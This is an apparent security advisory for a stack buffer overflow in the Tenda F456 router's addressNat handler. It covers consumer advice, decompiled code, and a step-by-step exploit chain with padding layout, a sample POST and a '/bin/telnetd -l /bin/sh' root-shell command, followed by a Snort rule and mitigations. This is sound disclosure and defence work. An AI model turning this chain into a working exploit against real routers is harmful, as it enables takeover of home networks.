CVE-2026-7029: Tenda F456 addressNat Stack Overflow via Unbounded strcpy
fromaddressNat() in Tenda F456 1.0.0.5 copies attacker-controlled POST parameters into fixed-size stack buffers without bounds checks, enabling unauthenticated RCE from the LAN.
A serious security flaw has been discovered in Tenda F456 routers, which are popular budget-friendly wifi devices sold worldwide. The vulnerability allows hackers to remotely take control of your router without needing any password — they just need to send specially crafted data to the device and it will do whatever they want.
Think of it like this: your router has a security guard checking who comes through the door, but the guard doesn't actually verify the visitor's ID properly. A hacker can slip past by sending a suspiciously long request that overwhelms the router's memory, essentially crashing its defenses and letting them in.
This matters because your router is the gateway to your home network. If someone controls it, they can spy on your internet traffic, steal passwords, inject malware into your devices, or use your connection to launch attacks on others. You might not even notice it's happening.
Who's at risk? Anyone using a Tenda F456 router running firmware version 1.0.0.5 is vulnerable. This includes home users, small offices, and potentially some business networks that picked these routers for their low cost.
Here's what you should do right now:
First, check if you own this specific router model and firmware version — you can usually find this in your router's settings under "System Information" or "About." If you do, contact Tenda's support immediately asking for a firmware update, or consider replacing the router if updates aren't available soon.
Second, as a general practice, change your router's default admin password immediately if you haven't already. Many people leave these unchanged, making other vulnerabilities easier to exploit.
Third, consider moving sensitive activities like online banking to a mobile device on cellular data rather than your home wifi, at least until this is patched.
Want the full technical analysis? Click "Technical" above.
▶ Attack flow — CVE-2026-7029 · Buffer Overflow
Vulnerability Overview
CVE-2026-7029 is a stack-based buffer overflow in the Tenda F456 router firmware version 1.0.0.5. The vulnerability exists in the HTTP POST handler for /goform/addressNat, specifically inside the function fromaddressNat(). An attacker on the local network — or remotely if the management interface is exposed — can submit an oversized menufacturer or Go parameter to overwrite the saved return address on the stack, gaining arbitrary code execution under the httpd process, which typically runs as root on these devices.
The CVSS score of 8.8 (HIGH) reflects network accessibility, low attack complexity, no required privileges, and full CIA impact. A public proof-of-concept is available.
Affected Component
The vulnerable binary is httpd, the embedded web server bundled with the Tenda F456 firmware. All known builds of version 1.0.0.5 are affected. The NAT address management handler is registered at router startup and services POST requests routed to /goform/addressNat. Parameter extraction is handled via the firmware's internal CGI helper websGetVar(), which returns a raw pointer into the HTTP body buffer with no length metadata propagated to the caller.
Root Cause Analysis
The fromaddressNat() function allocates fixed-size buffers on the stack for the menufacturer and Go form fields, then copies the raw attacker-controlled string directly using strcpy(). No length validation occurs between websGetVar() returning the pointer and the copy operation.
// Decompiled pseudocode — fromaddressNat()
// File: httpd (Tenda F456 1.0.0.5, MIPS32 LE)
int fromaddressNat(webs_t wp, int argc, char **argv) {
char manufacturer_buf[64]; // stack buffer, fixed size
char go_buf[64]; // stack buffer, fixed size
char rule_entry[128]; // downstream scratch buffer
int rule_count;
char *p_manufacturer;
char *p_go;
// websGetVar returns a raw pointer into the HTTP body — no length
p_manufacturer = websGetVar(wp, "menufacturer", "");
p_go = websGetVar(wp, "Go", "");
// BUG: no bounds check before copy; attacker controls length entirely
strcpy(manufacturer_buf, p_manufacturer); // overflows at >64 bytes
strcpy(go_buf, p_go); // overflows at >64 bytes
rule_count = atoi(websGetVar(wp, "entrys", "0"));
// Downstream processing — never reached if overflow redirects control
build_nat_rule(rule_entry, manufacturer_buf, go_buf, rule_count);
nvram_set("nat_manufacturer", rule_entry);
websWrite(wp, "HTTP/1.0 200 OK\r\n\r\n");
websDone(wp, 200);
return 0;
}
The stack layout on a typical MIPS32 ABI call frame places manufacturer_buf at a negative offset from the saved $ra (return address). A 64-byte buffer with the return address roughly 192 bytes above the buffer base means an overflow of as little as ~128 bytes of padding plus 4 bytes of payload overwrites $ra cleanly.
Root cause:fromaddressNat() calls strcpy() into a 64-byte stack buffer using a length-unbounded pointer returned directly from websGetVar(), with no intervening bounds check.
Memory Layout
The approximate stack frame for fromaddressNat() under the MIPS O32 calling convention:
Because httpd on the Tenda F456 is statically linked against uClibc with no PIE and ASLR is absent on the MIPS target, gadget addresses are fixed per firmware build. Stack canaries are not present in the affected binary. A straightforward ret2libc or ROP chain to system() is viable.
EXPLOIT CHAIN:
1. Identify firmware build — confirm version 1.0.0.5 via /goform/GetRouterStatus
or banner; extract gadget offsets from static httpd binary.
2. Craft POST body:
menufacturer = [64 bytes padding] // fills manufacturer_buf
+ [128 bytes padding] // traverses rule_entry
+ [64 bytes padding] // traverses go_buf
+ [4 bytes: saved $s0 value] // preserve or clobber
+ [4 bytes: saved $s1 value]
+ [4 bytes: saved $s2 value]
+ [4 bytes: target $ra] // e.g., ROP gadget or system()
Go = "/bin/telnetd -l /bin/sh" // command string in go_buf
3. Deliver request — no authentication required on default LAN config:
POST /goform/addressNat HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length:
menufacturer=&Go=/bin/telnetd+-l+/bin/sh&entrys=1
4. strcpy() in fromaddressNat() copies payload, overwriting saved $ra with
ROP gadget address pointing into uClibc's system() trampoline.
5. Function epilogue restores $ra from stack, executes `jr $ra` — control
transferred to attacker-controlled address.
6. system() executes Go parameter value ("/bin/telnetd -l /bin/sh"),
binding an unauthenticated root shell on TCP/23.
Even without ROP, a simple ret2system works because the Go buffer, written before manufacturer_buf is overflowed, sits at a known static offset and contains the command string at the time of the jump.
The correct fix introduces an explicit length check using strnlen() on the value returned by websGetVar() before any copy, and replaces strcpy() with the bounded strncpy() variant. An alternative — preferred in modern embedded firmware — is to sanitize at the websGetVar() layer itself and return a pre-truncated string.
A defense-in-depth measure would also enforce input validation at the HTTP layer — rejecting requests where any single parameter value exceeds a reasonable maximum (e.g., 256 bytes) before dispatch to the CGI handler.
Detection and Indicators
On the wire, exploitation attempts are identifiable by anomalously large POST bodies to /goform/addressNat with a menufacturer or Go field exceeding 64 bytes. Legitimate use of this endpoint involves short manufacturer strings and simple navigation targets.
DETECTION SIGNATURES:
Network (Snort/Suricata):
alert http any any -> $HOME_NET 80 (
msg:"CVE-2026-7029 Tenda F456 addressNat overflow attempt";
flow:established,to_server;
http.method; content:"POST";
http.uri; content:"/goform/addressNat";
http.request_body; content:"menufacturer=";
byte_jump:0,13,relative;
isdataat:65,relative; // parameter value exceeds buffer size
sid:20267029; rev:1;
)
Host (filesystem indicators post-exploitation):
- Unexpected listener on TCP/23 (telnetd): `netstat -tnlp | grep :23`
- /tmp/sh or /tmp/*.elf dropped by stage-2 payload
- Anomalous httpd child processes with shell ancestry
Syslog pattern (if logging enabled):
httpd: segfault or watchdog reset immediately following POST to addressNat
Remediation
Primary: Apply firmware update from Tenda when available. Monitor the vendor advisory page for build 1.0.0.6 or later.
Interim mitigations:
Restrict access to the router management interface (port 80/443) to trusted LAN hosts only via ACL or firewall rule.
Disable remote management if enabled — the attack surface drops to LAN-only, requiring physical or prior network access.
Monitor for unsolicited telnet listeners or unexpected outbound connections from the gateway IP.
Where the device sits behind a CPE with its own firewall, ensure the management VLAN is isolated from untrusted client segments.
There is no viable workaround that preserves NAT address management functionality while fully neutralizing the vulnerability short of patching the binary — the parameter is required for the feature and the copy path is unconditional.